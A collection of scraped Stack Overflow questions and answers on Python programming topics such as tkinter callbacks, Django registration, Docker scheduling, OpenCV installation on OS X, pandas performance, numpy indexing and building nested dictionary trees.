<p>I am writing a gui in tkinter and using a publish/subscribe module (pyPubSub) to inform different parts of the program of what is occurring if they're subscribed. So, I have two functions that I need to work together. From tkinter, I'm using:</p> <pre><code>after_idle(callback, *args) </code></pre> <p>to call the message sending within the mainloop. As you can see, it only accepts *args for the arguments to send to the callback. The callback I'm sending is from pyPubSub:</p> <pre><code>sendMessage(topic, **kwargs) </code></pre> <p>So, I end up with this:</p> <pre><code>root.after_idle(pub.sendMessage, ?) </code></pre> <p>My question is, how do I make args work with kwargs? I have to call after_idle with positional arguments to send with the callback, but the callback requires keyword arguments only.</p>
0
2016-08-02T02:15:37Z
38,710,929
<p>You could always use <code>lambda</code>; here's a short example:</p> <pre><code>import tkinter as tk def test(arg1, arg2): print(arg1, arg2) root = tk.Tk() root.after_idle(lambda: test(arg1=1, arg2=2)) root.mainloop() </code></pre>
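`functools.partial` is a common alternative to `lambda` for this: it freezes positional and keyword arguments into a no-argument callable, which is exactly what `after_idle` wants. The sketch below uses a stand-in function instead of `pub.sendMessage` so it runs without a Tk window — the topic and keyword names are made up:

```python
from functools import partial

def send_message(topic, **kwargs):       # stand-in for pub.sendMessage
    return topic, kwargs

# Freeze the positional topic and the keyword arguments:
callback = partial(send_message, 'root.topic', user='alice', score=3)

# In the real GUI code this would be: root.after_idle(callback)
print(callback())   # -> ('root.topic', {'user': 'alice', 'score': 3})
```

Unlike a `lambda`, the `partial` captures the argument values at creation time, which avoids late-binding surprises when building callbacks in a loop.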
3
2016-08-02T02:33:42Z
[ "python", "python-3.x", "tkinter", "arguments", "publish-subscribe" ]
Django Registration Redux Custom View
38,710,806
<p>(Django 1.8, Django-Registration-Redux 1.4)</p> <p>After following the answer in this SO post: <a href="http://stackoverflow.com/questions/29620940/django-registration-redux-add-extra-field">django-registration-redux add extra field</a></p> <p>I've implemented a custom view with my own template to register a user, and my custom form is correctly rendered.</p> <p>user_views.py</p> <pre><code>class SignupView(RegistrationView): form_class = MyRegistrationForm def register(self, request, form): print form print request new_user = super(SignupView, self).register(request, form) my_user_model = MyUserModel() my_user_model.user = new_user my_user_model.save() return new_user </code></pre> <p>However, register doesn't seem to get called. But, when I define post() - the request comes through with all of the form data. </p> <p>urls.py</p> <pre><code>url( r'^accounts/register/', user_views.SignupView.as_view(), name='signup' ), # Customized-Register url( r'^accounts/', include('registration.backends.default.urls') ), # Registration-Redux </code></pre> <p>Would appreciate guidance on the correct usage, thanks!</p>
0
2016-08-02T02:16:08Z
38,725,172
<p>Ok - I've determined the solution. It had to do with my custom form not collecting the (required) username field.</p> <p>In case it helps, I figured it out by implementing form_invalid(self, form), since RegistrationView is a derived class of Django's FormView, which hinted me towards it.</p> <p>This SO answer helped override the username requirement: <a href="http://stackoverflow.com/questions/31356535/django-registration-redux-how-to-change-the-unique-identifier-from-username-to">Django Registration Redux: how to change the unique identifier from username to email and use email as login</a></p> <p>Hope it helps</p>
0
2016-08-02T15:51:17Z
[ "python", "django", "django-registration" ]
How can a few small Python scripts be run periodically with Docker?
38,710,923
<p>I currently have a handful of small Python scripts on my laptop that are set to run every 1-15 minutes, depending on the script in question. They perform various tasks for me like checking for new data on a certain API, manipulating it, and then posting it to another service, etc.</p> <p>I have a NAS/personal server (unRAID) and was thinking about moving the scripts to there via Docker, but since I'm relatively new to Docker I wasn't sure about the best approach.</p> <p>Would it be correct to take something like the <a href="https://github.com/phusion/baseimage-docker" rel="nofollow">Phusion Baseimage</a> which includes Cron, package my scripts and crontab as dependencies to the image, and write the Dockerfile to initialize all of this? Or would it be a more canonical approach to modify the scripts so that they are threaded with recursive timers and just run each script individually in it's own <a href="https://hub.docker.com/_/python/" rel="nofollow">official Python image</a>?</p>
0
2016-08-02T02:33:22Z
38,720,038
<p>No dude, just install Python on the Docker container/image, move your scripts over, and run them as normal. You may have to expose some port or add a firewall exception, but your container can behave like a native Linux environment.</p>
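If you'd rather skip cron inside the container entirely, each script can loop on its own timer and run as the container's main process — a minimal stdlib sketch (the interval, task, and `max_runs` knob are placeholders; in a container you'd omit `max_runs` so it loops forever):

```python
import time

def run_periodically(task, interval_seconds, max_runs=None):
    """Call task() every interval_seconds; max_runs=None loops forever."""
    runs = 0
    while max_runs is None or runs < max_runs:
        task()                     # e.g. poll the API, post results, ...
        runs += 1
        if max_runs is None or runs < max_runs:
            time.sleep(interval_seconds)
    return runs

# Demo with a tiny interval so it finishes instantly:
results = []
print(run_periodically(lambda: results.append('checked API'), 0.01, max_runs=3))
```

With this shape, the Dockerfile's `CMD` is just `python myscript.py`, and Docker's restart policy covers crashes — no cron image needed.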
0
2016-08-02T12:08:59Z
[ "python", "docker", "dockerfile" ]
trigamma and digamma functions for bigfloat variable in python
38,710,962
<p>I need to compute the <code>scipy.special</code> trigamma and digamma functions of a variable with type <em>bigfloat</em> in python but I get the following error message:</p> <pre><code>TypeError: ufunc 'psi' not supported for the input types, and the inputs could not be safely coerced to any supported types according to the casting rule 'safe' </code></pre> <p>I need to keep my variables as bigfloat for precision purposes. Does any body know how I can compute digamma and trigamma functions for such variables? Thanks.</p>
0
2016-08-02T02:38:08Z
38,711,958
<p>Multiple precision implementations of digamma are available in <a href="https://pypi.python.org/pypi/gmpy2" rel="nofollow">gmpy2</a>, <a href="https://pypi.python.org/pypi/mpmath/0.19" rel="nofollow">mpmath</a>, and <a href="http://fredrikj.net/python-flint/index.html" rel="nofollow">Python-FLINT</a>. I am not aware of any implementations of trigamma.</p> <p>Disclaimer: I maintain <code>gmpy2</code>.</p>
1
2016-08-02T04:47:50Z
[ "python", "derivative", "gamma-function", "bigfloat" ]
How do you parse this JSON in Python?
38,710,971
<p>JSON below</p> <pre><code>{"result":[ { "spawn_point_id":"89", "encounter_id":"1421", "expiration_timestamp_ms":"1470105387836", "latitude":38.22, "longitude": -91.27 }, { "distance_in_meters":10, "encounter_id":"9677" }, { "distance_in_meters":10, "encounter_id":"1421" }, { "spawn_point_id":"11", "encounter_id":"2142", "expiration_timestamp_ms":"1470105387444", "latitude":38.00, "longitude": -91.00 } ]} </code></pre> <p>and i want the output to look like</p> <pre><code>spawn 89 at lat 38.22 long -91.27 spawn 11 at lat 38.00 long -91.00 </code></pre> <p>i used <code>json.loads</code> and it actually makes the json look funky. </p> <p>Code so far below:</p> <pre><code>c = json.loads(r.content) for d in c['result']: if d['latitude'] is not None: print(str(d['latitude'])) </code></pre> <p>seems to kind of work but then get error</p> <pre><code>Traceback (most recent call last): File "fast0.py", line 11, in &lt;module&gt; if d['latitude'] is not None: KeyError: 'latitude' </code></pre>
-6
2016-08-02T02:38:43Z
38,711,232
<p>You are looking for a key that does not exist. Try:</p> <pre><code>c = json.loads(r.content) for d in c['result']: if 'latitude' in d: print(str(d['latitude'])) </code></pre>
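Putting the key check together with formatting to produce exactly the output the question asks for — a stdlib-only sketch, parsing the JSON from a string here in place of `r.content`:

```python
import json

raw = '''{"result":[
 {"spawn_point_id":"89","encounter_id":"1421",
  "expiration_timestamp_ms":"1470105387836","latitude":38.22,"longitude":-91.27},
 {"distance_in_meters":10,"encounter_id":"9677"},
 {"spawn_point_id":"11","encounter_id":"2142",
  "expiration_timestamp_ms":"1470105387444","latitude":38.00,"longitude":-91.00}
]}'''

lines = []
for d in json.loads(raw)['result']:
    if 'latitude' in d:   # skip entries without coordinates
        lines.append('spawn {} at lat {:.2f} long {:.2f}'.format(
            d['spawn_point_id'], d['latitude'], d['longitude']))

print('\n'.join(lines))
# spawn 89 at lat 38.22 long -91.27
# spawn 11 at lat 38.00 long -91.00
```

`'latitude' in d` (or `d.get('latitude')`) is the key point: entries like the `distance_in_meters` ones simply don't have that key, which is what raised the `KeyError`.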
0
2016-08-02T03:17:41Z
[ "python", "json" ]
Encoding data's label for text classification
38,710,993
<p>I am doing a project in clinical text classification. In my corpus ,data are already labelled by code (For examples: 768.2, V13.02, V13.09, 599.0 ...). I already separated text and labels then using word-embedded for text. I am going to feed them into convolution neural network. However, the labels are needs to encode, I read examples of sentiment text classification and mnist but they all used integers to classify their data, my label in text form that why I cannot use one-hot encoding like them. Could anyone suggest any way to do it ? Thanks </p>
0
2016-08-02T02:41:50Z
38,711,955
<p>Discrete text labels are easily convertible to discrete numeric data by creating an enumeration mapping. For example, assuming the labels "Yes", "No" and "Maybe":</p> <pre><code>No -&gt; 0 Yes -&gt; 1 Maybe -&gt; 2 </code></pre> <p>And now you have numeric data, which can later be converted back (as long as the algorithm treats those as discrete values and does not return 0.5 or something like that).</p> <p>In the case each instance can have multiple labels, as you said in a comment, you can create the encoding by putting each label in a column ("one-hot encoding"). Even if some software does not implement that off-the-shelf, it is not hard to do by hand.</p> <p>Here's a very simple (and not well-written to be honest) example using Pandas' get_dummies function:</p> <pre><code>import numpy as np import pandas as pd labels = np.array(['a', 'b', 'a', 'c', 'ab', 'a', 'ac']) df = pd.DataFrame(labels, columns=['label']) ndf = pd.get_dummies(df) ndf.label_a = ndf.label_a + ndf.label_ab + ndf.label_ac ndf.label_b = ndf.label_b + ndf.label_ab ndf.label_c = ndf.label_c + ndf.label_ac ndf = ndf.drop(['label_ab', 'label_ac'], axis=1) ndf label_a label_b label_c 0 1.0 0.0 0.0 1 0.0 1.0 0.0 2 1.0 0.0 0.0 3 0.0 0.0 1.0 4 1.0 1.0 0.0 5 1.0 0.0 0.0 6 1.0 0.0 1.0 </code></pre> <p>You can now train a multivariate model to output the values of <code>label_a</code>, <code>label_b</code> and <code>label_c</code> and then reconstruct the original labels like "ab". Just make sure the output is in the set [0, 1] (by applying a softmax layer or something like that).</p>
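The enumeration mapping from the first part takes only a couple of lines with the stdlib — the clinical codes below are taken from the question and used as placeholders:

```python
labels = ['768.2', 'V13.02', 'V13.09', '599.0']   # codes seen in the corpus

# Sort for a deterministic mapping, then enumerate:
encode = {label: i for i, label in enumerate(sorted(labels))}
decode = {i: label for label, i in encode.items()}

encoded = [encode[l] for l in ['V13.02', '599.0', 'V13.02']]
print(encoded)                       # integer class ids for the network
print([decode[i] for i in encoded])  # and back to the original codes
```

Those integer ids are what you then one-hot (or feed to a sparse-label loss); `decode` turns predictions back into the clinical codes.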
1
2016-08-02T04:47:39Z
[ "python", "encoding", "tensorflow", "text-classification" ]
Encoding data's label for text classification
38,710,993
<p>I am doing a project in clinical text classification. In my corpus ,data are already labelled by code (For examples: 768.2, V13.02, V13.09, 599.0 ...). I already separated text and labels then using word-embedded for text. I am going to feed them into convolution neural network. However, the labels are needs to encode, I read examples of sentiment text classification and mnist but they all used integers to classify their data, my label in text form that why I cannot use one-hot encoding like them. Could anyone suggest any way to do it ? Thanks </p>
0
2016-08-02T02:41:50Z
38,713,767
<p>Watch this 4-minute video (Coursera: ML classification (University of Washington)-> Week1 -> Encoding Categorical Inputs) <a href="https://www.coursera.org/learn/ml-classification/lecture/kCY0D/encoding-categorical-inputs" rel="nofollow">https://www.coursera.org/learn/ml-classification/lecture/kCY0D/encoding-categorical-inputs</a></p> <p>There are two methods of encoding:</p> <ol> <li><p>One Hot Encoding</p></li> <li><p>Bag of words (I think this is the more suitable method in this case)</p></li> </ol> <p>The following diagram describes how the bag-of-words method works. Text can contain, say, 10,000 different words — or more, many more, millions. What bag of words does is take that text and encode it as counts. </p> <p><a href="http://i.stack.imgur.com/Nwz6o.png" rel="nofollow"><img src="http://i.stack.imgur.com/Nwz6o.png" alt="enter image description here"></a></p> <p>Edit 1</p> <p><strong>Python Implementation:</strong> Visit <a href="http://www.python-course.eu/text_classification_python.php" rel="nofollow">http://www.python-course.eu/text_classification_python.php</a> </p>
1
2016-08-02T07:03:50Z
[ "python", "encoding", "tensorflow", "text-classification" ]
Flask Admin editing columns send requests
38,710,997
<p>I am using flask-admin with ModelViews</p> <pre><code>class MyModel(ModelView): can_create = False can_edit = True column_list = ['column'] </code></pre> <p>This allows me to edit the data on each row. However I want to perform some custom function in addition to the editing. I tried to add a route for the edit but it overrides the existing functionality.</p> <pre><code>@app.route('/admin/mymodelview/edit/', methods=['POST']) def do_something_in_addition(): ... </code></pre> <p>Is there any way to extend the existing edit functionality?</p>
0
2016-08-02T02:42:06Z
38,717,857
<p>Override either the <a href="https://flask-admin.readthedocs.io/en/latest/api/mod_model/#flask_admin.model.BaseModelView.after_model_change" rel="nofollow">after_model_change</a> method or the <a href="https://flask-admin.readthedocs.io/en/latest/api/mod_model/#flask_admin.model.BaseModelView.on_model_change" rel="nofollow">on_model_change</a> method in your view class.</p> <p>For example:</p> <pre><code>class MyModel(ModelView): can_create = False can_edit = True column_list = ['column'] def after_model_change(self, form, model, is_created): # model has already been committed here # do custom work pass def on_model_change(self, form, model, is_created): # model has not been committed yet so can be changed # do custom work that can affect the model pass </code></pre>
1
2016-08-02T10:24:56Z
[ "python", "database", "flask-admin" ]
Opencv3: Error when importing cv2 in Python on OS X El Capitan
38,711,098
<p>I installed OpenCV 3.1 on Mac OS X, and I also created a symlink in </p> <pre><code>/Library/Python/2.7/site-packages: cv2.so -&gt; /usr/local/Cellar/opencv3/3.1.0_3/lib/python2.7/site-packages/cv2.so </code></pre> <p>But when I import cv2 in the terminal I get this error:</p> <pre><code>&gt;&gt;&gt; import cv2 Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib Referenced from: /usr/local/Cellar/opencv3/3.1.0_3/lib/libopencv_imgcodecs.3.1.dylib Reason: image not found </code></pre> <p>Then I tried to install webp using MacPorts:</p> <pre><code>sudo port install webp </code></pre> <p>But after that I still get the error above when importing cv2 in Python:</p> <pre><code>ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib </code></pre> <p>Any help would be appreciated.</p>
2
2016-08-02T02:56:34Z
38,738,295
<p>I found the solution <a href="https://developers.google.com/speed/webp/docs/compiling#building" rel="nofollow">here</a>. Installing webp using MacPorts did not solve the problem; I had to install webp following these steps:</p> <ul> <li>Download libwebp-0.5.1.tar.gz (not libwebp-0.5.1-mac-10.9.tar.gz) from <a href="https://storage.googleapis.com/downloads.webmproject.org/releases/webp/index.html" rel="nofollow">here</a></li> <li>Untar the package:</li> </ul> <p><code>tar xvzf libwebp-0.5.1.tar.gz</code></p> <ul> <li><p>Go to the directory where libwebp-0.5.1/ was extracted and run the following commands:</p> <pre><code>cd libwebp-0.5.1 ./configure make sudo make install </code></pre></li> </ul> <p>That worked for me.</p>
0
2016-08-03T08:26:39Z
[ "python", "osx", "python-2.7", "opencv", "opencv3.1" ]
Opencv3: Error when importing cv2 in Python on OS X El Capitan
38,711,098
<p>I installed OpenCV 3.1 on Mac OS X, and I also created a symlink in </p> <pre><code>/Library/Python/2.7/site-packages: cv2.so -&gt; /usr/local/Cellar/opencv3/3.1.0_3/lib/python2.7/site-packages/cv2.so </code></pre> <p>But when I import cv2 in the terminal I get this error:</p> <pre><code>&gt;&gt;&gt; import cv2 Traceback (most recent call last): File "&lt;stdin&gt;", line 1, in &lt;module&gt; ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib Referenced from: /usr/local/Cellar/opencv3/3.1.0_3/lib/libopencv_imgcodecs.3.1.dylib Reason: image not found </code></pre> <p>Then I tried to install webp using MacPorts:</p> <pre><code>sudo port install webp </code></pre> <p>But after that I still get the error above when importing cv2 in Python:</p> <pre><code>ImportError: dlopen(/Library/Python/2.7/site-packages/cv2.so, 2): Library not loaded: /usr/local/opt/webp/lib/libwebp.6.dylib </code></pre> <p>Any help would be appreciated.</p>
2
2016-08-02T02:56:34Z
39,401,123
<p>I had the same issue, and running <code>brew install webp</code> simply fixed the import issue in Python.</p> <p>I hope this helps you.</p>
2
2016-09-08T22:29:30Z
[ "python", "osx", "python-2.7", "opencv", "opencv3.1" ]
Why pandas apply much slower than dataframe merge
38,711,147
<p>From my <a href="http://stackoverflow.com/questions/38697404/pandas-explanation-on-apply-function-being-slow/38708239?noredirect=1#comment64799081_38708239">previous question</a>, I know that apply is much slower than a direct dataframe merge.</p> <p>But I am still confused about why it is that much slower; in my understanding, if there are N rows in the dataframe, the apply function should run in O(N)...</p> <p>Could anyone explain the theory behind apply and dataframe merge to me? Or are there any resources for studying that?</p> <p>Thanks in advance :)</p>
1
2016-08-02T03:05:05Z
38,711,326
<p>The answer is <strong>yes</strong>. Python can be hundreds of times slower than C, just because it's Python, with equivalent asymptotics. As an applied mathematician with lots of number-crunching experience, I can testify that C can be tens to hundreds of times faster than Python. See <a href="https://benchmarksgame.alioth.debian.org/u64q/compare.php?lang=python3&amp;lang2=gpp" rel="nofollow">these benchmarks</a> for an official source. </p> <p>Remember that asymptotic complexity is about <strong>scaling only</strong>. Two algorithms can easily have the same complexity and yet differ in runtime by orders of magnitude. Now, if you find that Python is slowing down <strong>by a greater factor</strong> than C is (that is, doubling the input more than doubles the runtime when it's supposed to be linear), you could be dealing with an asymptotically significant algorithmic difference.</p>
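To make the constant-factor point concrete, here is a small, hedged benchmark sketch (the frame and column names below are made up, not the asker's data): a row-wise `apply` runs a Python-level function call per row, while the vectorized form makes a single call into pandas/NumPy compiled code, so both are O(N) but with very different constants.

```python
import time
import pandas as pd

n = 50_000
df = pd.DataFrame({"a": range(n), "b": range(n)})

# Row-wise apply: one Python function call (and one row Series) per row.
t0 = time.perf_counter()
slow = df.apply(lambda row: row["a"] + row["b"], axis=1)
t_apply = time.perf_counter() - t0

# Vectorized: a single call into compiled code.
t0 = time.perf_counter()
fast = df["a"] + df["b"]
t_vec = time.perf_counter() - t0

# Same result either way; t_apply is typically orders of magnitude larger.
```

Both paths perform N additions, so the asymptotics match; the gap is entirely per-row Python interpreter overhead.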
1
2016-08-02T03:28:40Z
[ "python", "pandas" ]
Installation: Reportlab: "ImportError: No module named reportlab.lib"
38,711,221
<p>I've installed reportlab via</p> <pre><code>pip install reportlab </code></pre> <p>(also tried via</p> <pre><code>easy_install reportlab </code></pre> <p>)</p> <p>...but I get the above error. There are other RL imports before that - it's the .lib that it's objecting to. I've had RL working great in the past, but IT reimaged my computer, and I'm trying to rebuild it. The script works fine, but there's something funky with the RL install, I think.</p> <p>Reportlab: 3.3.0</p>
1
2016-08-02T03:15:11Z
38,769,487
<p>Most of the time, errors like this are caused by a broken package, either in the package itself or in one of its dependencies.</p> <p>The best way to resolve such an issue is to force-reinstall the package; this reinstalls the package and its dependencies, potentially repairing the package.</p> <p>To force-reinstall <code>reportlab</code>, use:</p> <pre><code>pip install --upgrade --force-reinstall reportlab </code></pre>
0
2016-08-04T13:59:10Z
[ "python", "installation", "pip", "reportlab" ]
updating specific numpy matrix columns
38,711,248
<p>I have the following list of indices, <code>[2 4 3 4]</code>, which correspond to my target indices. I'm creating a matrix of zeros with the following line of code: <code>targets = np.zeros((features.shape[0], 5))</code>. I'm wondering if it's possible to slice in such a way that I could update the specific indices all at once and set those values to 1 without a for loop; ideally the matrix would look like<br> <code>([0,0,1,0,0], [0,0,0,0,1], [0,0,0,1,0], [0,0,0,0,1])</code></p>
3
2016-08-02T03:19:47Z
38,711,497
<p>I believe you can do something like this:</p> <pre><code>targets = np.zeros((4, 5)) ind = [2, 4, 3, 4] targets[np.arange(0, 4), ind] = 1 </code></pre> <p>Here is the result:</p> <pre><code>array([[ 0., 0., 1., 0., 0.], [ 0., 0., 0., 0., 1.], [ 0., 0., 0., 1., 0.], [ 0., 0., 0., 0., 1.]]) </code></pre>
4
2016-08-02T03:53:10Z
[ "python", "numpy" ]
Create a tree from multiple nested dictionaries/lists in Python
38,711,365
<p><strong>Preface</strong>: To help explain <strong>why</strong> I am doing this, I will explain the end goal. Essentially I have a list of <em>accounts</em> that are defined in a very specific syntax. Here are some examples:</p> <pre><code>Assets:Bank:Car Assets:Bank:House Assets:Savings:Emergency Assets:Savings:Goals:Roof Assets:Reserved </code></pre> <p>As can be seen above, an account can have any number of parents and children. The end goal is to parse the above accounts into a tree structure in Python that will be used for providing account auto-completion in the Sublime Text Editor (i.e, if I typed <em>Assets:</em> and then queried for auto-complete, I would be presented with a list as such: <em>Bank, Savings, Reserved</em>)</p> <p><strong>The Result:</strong> Using the account list from the preface, the desired result in Python would look something like below:</p> <pre><code>[ { "Assets":[ { "Bank":[ "Car", "House" ] }, { "Savings":[ "Emergency", { "Goals":[ "Roof" ] } ] }, "Reserved" ] } ] </code></pre> <p><strong>Half-Solution:</strong> I was able to get two basic accounts to get added together using recursion. This works for adding these two: <code>Assets:Bank:Car</code> and <code>Assets:Bank:House</code>. 
However, once they start to differ it starts to fall apart and the recursion gets messy, so I'm not sure if it's the best way.</p> <pre><code>import re def parse_account(account_str): subs = account_str.split(":") def separate(subs): if len(subs) == 1: return subs elif len(subs): return [{subs[0]: separate(subs[1:])}] return separate(subs) def merge_dicts(a, b): # a will be a list with dictionaries and text values and then nested lists/dictionaries/text values # b will always be a list with ONE dictionary or text value key = b[0].keys()[0] # this is the dictionary key of the only dictionary in the b list for item in a: # item is a dictionary or a text value if isinstance(item, dict): # if item is a dictionary if key in item: # Is the value a list with a dict or a list with a text value if isinstance(b[0][key][0], str): # Extend the current list with the new value item[key].extend(b[0][key]) else: # Recurse to the next child merge_dicts(item[key], b[0][key]) else: return a # Accounts have an "open [name]" syntax for defining them text = "open Assets:Bank:Car\nopen Assets:Bank:House\nopen Assets:Savings:Emergency\nopen Assets:Savings:Goals:Roof\nopen Assets:Reserved" EXP = re.compile("open (.*)") accounts = EXP.findall(text) # This grabs all accounts # Create a list of all the parsed accounts dicts = [] for account in accounts: dicts.append(parse_account(account)) # Attempt to merge two accounts together final = merge_dicts(dicts[0], dicts[1]) print final # In the future we would call: reduce(merge_dicts, dicts) to merge all accounts </code></pre> <p>I could be going about this in the completely wrong way and I would be interested in differing opinions. Otherwise, does anyone have insight into how to make this work with the remaining accounts in the example string?</p>
0
2016-08-02T03:36:18Z
38,712,931
<p>That took me ages to sort out in my head. The dictionaries are simple, one key which always has a list as a value - they're used to have a named list.</p> <p>Inside the lists will be a string, or another dictionary (with a key with a list).</p> <p>That means we can break up 'Assets:Bank:Car' and look for a dictionary in the root list matching <code>{"Assets":[&lt;whatever&gt;]}</code> or add one - and then jump to the <code>[&lt;whatever&gt;]</code> list two levels deeper. Next loop, look for a dictionary matching <code>{"Bank":[&lt;whatever&gt;]}</code>, or add one, jump to the <code>[&lt;whatever&gt;]</code> list two levels deeper. Keep doing that until we hit the last node <code>Car</code>. We must be on <em>a</em> list since we always jumped to an existing list or made a new one, so put <code>Car</code> in the current list.</p> <p>NB. this approach would break if you had</p> <pre><code>Assets:Reserved Assets:Reserved:Painting </code></pre> <p>but that would be a nonsense conflicting input, asking "Reserved" to be both leaf node and container, and in that situation you would only have:</p> <pre><code>Assets:Reserved:Painting </code></pre> <p>right?</p> <pre><code>data = """ Assets:Bank:Car Assets:Bank:House Assets:Savings:Emergency Assets:Savings:Goals:Roof Assets:Reserved """ J = [] for line in data.split('\n'): if not line: continue # split the line into parts, start at the root list # is there a dict here for this part? # yes? cool, dive into it for the next loop iteration # no? 
add one, with a list, ready for the next loop iteration # (unless we're at the final part, then stick it in the list # we made/found in the previous loop iteration) parts = line.split(':') parent_list, current_list = J, J for index, part in enumerate(parts): for item in current_list: if part in item: parent_list, current_list = current_list, item[part] break else: if index == len(parts) - 1: # leaf node, add part as string current_list.append(part) else: new_list = [] current_list.append({part:new_list}) parent_list, current_list = current_list, new_list print J </code></pre> <p>-></p> <pre><code>[{'Assets': [{'Bank': ['Car', 'House']}, {'Savings': ['Emergency', {'Goals': ['Roof']}]}, 'Reserved']}] </code></pre> <p>Try online: <a href="https://repl.it/Ci5L" rel="nofollow">https://repl.it/Ci5L</a></p>
1
2016-08-02T06:10:55Z
[ "python", "dictionary", "recursion", "tree", "nested" ]
Saving option value from Django to mongodb
38,711,457
<p>I'm new to Django, and recently I've been working on a website that needs to show data from MongoDB and collect people's answers through forms. Now I'm stuck on saving data from the form to MongoDB. </p> <p>I want people to choose only one answer in the dropdown form. Here is the HTML:</p> <pre><code> &lt;table&gt; &lt;form action="/reply/" method="POST" &gt; &lt;td&gt; &lt;select name = "reply"&gt; &lt;option value="#"&gt;Choose&lt;/option&gt; &lt;option value="support"&gt;Support&lt;/option&gt; &lt;option value="against"&gt;Against&lt;/option&gt; &lt;option value="related"&gt;Related&lt;/option&gt; &lt;option value="irrelated"&gt;Irrelated&lt;/option&gt; &lt;/select&gt; &lt;input type="submit" value="OK!"&gt; &lt;/form&gt; &lt;/table&gt; </code></pre> <p>And here is my view:</p> <pre><code>def labeling(request): form = request.POST if form.is_valid(): db.label.insert({ reply : form, Post_ID : reequest.GET['id'] }) db.label.update return HttpResponseRedirect("") </code></pre> <p>I have created a collection named "label".</p> <p>I have been working on this problem for a long time... I'd appreciate it if someone could help me...</p>
0
2016-08-02T03:47:40Z
38,713,369
<p>This may work for you:</p> <p>Your views.py:</p> <pre><code>import json from django.http import HttpResponse def labeling(request): if request.method == 'POST': form = FormClassName(request.POST) if form.is_valid(): instance = form.save(commit=False) instance.reply = form.cleaned_data['reply'] instance.postId = form.cleaned_data['postId'] instance.save() data = {'success':True,'msg':'Stored user data successfully'} return HttpResponse(json.dumps(data),content_type="application/json") else: data = {'success':False,'msg':'Did not store user data'} return HttpResponse(json.dumps(data),content_type="application/json") </code></pre> <p>Your forms.py:</p> <pre><code>from django.forms import ModelForm class FormClassName(ModelForm): class Meta: model = modelName fields = [ "reply", "postId", ] </code></pre>
0
2016-08-02T06:40:48Z
[ "python", "django", "mongodb" ]
Python - Get the process id of an instance
38,711,472
<p>I'm trying to work with different processes in Python, and I am having some difficulty getting the PID of a particular instance.</p> <p>For example, I'm sending the mainCar instance in one class:</p> <pre><code>warehouse = Warehouse() mainCar = Car().start() warehouse.add(mainCar) </code></pre> <p>In the warehouse class, I'm receiving the mainCar variable and want to know its PID.</p> <p>How do I get the process ID using the mainCar variable? I would be passing this variable to a different class, and the process ID of this variable would be different from what os.getpid() gives me. </p> <p>Thanks in advance!</p>
0
2016-08-02T03:49:09Z
38,712,336
<p>I think you're fundamentally misunderstanding what's going on. Your question still doesn't make much sense, because objects have <em>no notion</em> of PID. Even if you used the multiprocessing module to spawn multiple processes and passed objects around with queues, there is no Python function that will automatically tell you the PID of the process that created the object. </p> <p>You could add something like this to your classes to track originator PIDs:</p> <pre><code>import os class PID_Tracked(object): def __init__(self): self.originating_PID = os.getpid() </code></pre> <p>But unless you manually store this data, there is <strong>zero</strong> association between objects and the PID of the process that created them.</p> <p>The one exception to all of this is if you're using the multiprocessing module. Some classes in that module will provide a PID to track the spawned processes. But nothing in your question indicates that you're using multiprocessing (at this time), so I've excluded a discussion of it.</p>
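For completeness, here is what the multiprocessing case mentioned above looks like. This is a sketch with a stand-in `drive` function (the asker's `Car`/`Warehouse` classes are not reproduced), and the explicit `"fork"` start method is Unix-only:

```python
import multiprocessing as mp
import os

def drive():
    # Runs in the child process; os.getpid() here differs from the parent's.
    pass

# "fork" is Unix-only; it avoids re-importing this module in the child,
# which keeps the sketch free of an `if __name__ == "__main__"` guard.
ctx = mp.get_context("fork")
proc = ctx.Process(target=drive)
proc.start()
child_pid = proc.pid      # PID of the spawned child process
parent_pid = os.getpid()  # PID of this (parent) process
proc.join()
```

The key point stands either way: `proc.pid` is an attribute of the `Process` handle, not of any object the child creates.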
0
2016-08-02T05:26:35Z
[ "python", "python-3.x" ]